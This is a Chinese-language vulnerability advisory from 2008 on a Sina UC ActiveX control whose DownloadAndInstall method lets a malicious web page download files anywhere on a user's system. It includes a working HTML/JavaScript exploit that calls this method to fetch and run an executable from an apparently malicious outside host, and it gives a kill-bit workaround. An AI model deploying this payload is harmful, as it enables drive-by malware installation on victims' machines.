发布日期：2008-07-14
更新日期：2008-07-18

受影响系统：

Sina UC

描述：

---

BUGTRAQ  ID: 30223

新浪UC是融合了P2P思想的开放式即时通讯和娱乐平台。

新浪UC客户端所安装的DLoader Class ActiveX控件（默认安装路径%Windir%\Downloaded Program Files\Downloader.DLL）没有正确地验证对DonwloadAndInstall方式的输入，如果用户受骗访问了恶意网页并向该方式传送了畸形参数的话，就会导致向用户系统的任意位置下载文件。目前已有蜜罐网络检测到该漏洞正在被积极的利用。

<*来源：Symantec
  
  链接：http://tieba.baidu.com/f?kz=436846317
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

< HTML>< HEAD>  
< META http-equiv=Content-Type content="text/html; charset=gb2312">  
< META content="MSHTML 6.00.2900.3354" name=GENERATOR></ HEAD>  
< BODY>  
< OBJECT id=install classid=clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A></ OBJECT>  
< SCRIPT>  
var YEtYcJsR1="hxxp://dddd.nihao69.cn/down/ko.exe";  
install["DownloadAndInstall"](YEtYcJsR1);  
</ SCRIPT>  
</ BODY></ HTML>

建议：

---

临时解决方法：

* 为clsid：78ABDC59-D8E7-44D3-9A76-9A0918C52B4A设置kill bit。

厂商补丁：

Sina
----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.51uc.com/

浏览次数：3971
严重程度：0（网友投票）